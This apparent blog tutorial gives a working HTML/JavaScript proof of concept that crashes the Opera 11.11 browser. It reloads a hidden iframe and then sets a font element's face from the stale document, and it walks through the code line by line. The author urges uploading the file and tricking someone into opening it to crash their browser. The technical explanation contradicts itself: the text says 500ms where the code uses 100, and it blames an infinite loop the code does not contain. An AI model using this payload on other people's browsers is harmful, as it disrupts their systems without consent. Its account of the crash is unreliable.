Opera 11.11 Crash Vulnerability Discussion



The Opera 11.11 web browser is vulnerable to a denial of service (DoS) and can be crashed remotely. The trick lies in refreshing/reloading an IFRAME and then putting one of its elements into an infinite loop. This time we are going to use the Font element.
So open up your Opera and load the exploit [which is in an HTML file] into it. You can get the exploit code from here.
 
Save this text as an HTML file. When this file is opened in Opera, memory use goes up and the browser crashes within a fraction of a second. The best part of this exploit is that you can also crash Opera remotely, say by uploading the file to any free web hosting site and then asking someone to open it. Doing so would crash his Opera.

Anyway, let's discuss the code.

<html>
  <body>
   <!-- hidden iframe; its document is what the script manipulates -->
   <iframe src='about:blank' id='bo0om' style="width:0px;height:0px;border:0px none;"></iframe>
   <script type="text/javascript" language="javascript">

      // grab the iframe and create a font element inside its document
      var a = window.document.getElementById('bo0om');
      var b = a.contentDocument.createElement('font');
      // reload the iframe, then touch the element from the old document later
      a.src='about:blank';
      setTimeout('b.face = "h3h";',100);

   </script>
  </body>
</html>



1.
<iframe src='about:blank' id='bo0om' style="width:0px;height:0px;border:0px none;"></iframe>

As you can see, we have taken an iframe with id = bo0om that has no source content, no height and no width.
2.

var a = window.document.getElementById('bo0om');


Then we took a variable 'a' and loaded the iframe element into it.
 
3.

var b = a.contentDocument.createElement('font');
From 'a' we derive 'b': the iframe's document, into which we add a font element, the element I discussed in the very first paragraph of this article.


4.
setTimeout('b.face = "h3h";',100);

Now, setting the timeout to be 500ms, we are asking our page to load "h3h" into the face attribute of the font element inside iframe bo0om (b.face, or we can say a.font.face, or ultimately bo0om.font.face = 'h3h').




Now the point is that this whole sequence ends up doing the same work in an infinite loop, so Opera continuously keeps repeating it. Due to the memory it consumes in doing so, it crashes.

This is the error report I got on my screen. You may see some differences.

             http://localhostr.com/file/1Tq9Ti9/crash20110928182514.txt
